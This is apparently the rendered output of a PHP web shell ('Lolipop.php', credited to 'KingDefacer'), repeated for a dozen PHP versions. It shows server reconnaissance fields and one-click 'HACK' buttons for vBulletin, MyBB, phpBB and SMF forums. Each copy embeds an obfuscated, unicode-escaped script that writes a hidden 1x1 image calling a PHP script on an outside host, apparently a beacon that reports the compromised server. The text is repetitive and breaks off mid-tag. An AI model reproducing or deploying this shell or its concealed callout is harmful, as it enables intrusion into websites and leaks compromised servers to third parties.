type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.27
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.27</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.26
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.26</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.25
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.25</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.24
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.24</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.23
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.23</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.22
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.22</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.21
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.21</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.20
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.20</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.19
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.19</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.18
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.18</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.17
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.17</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.16
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.16</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' 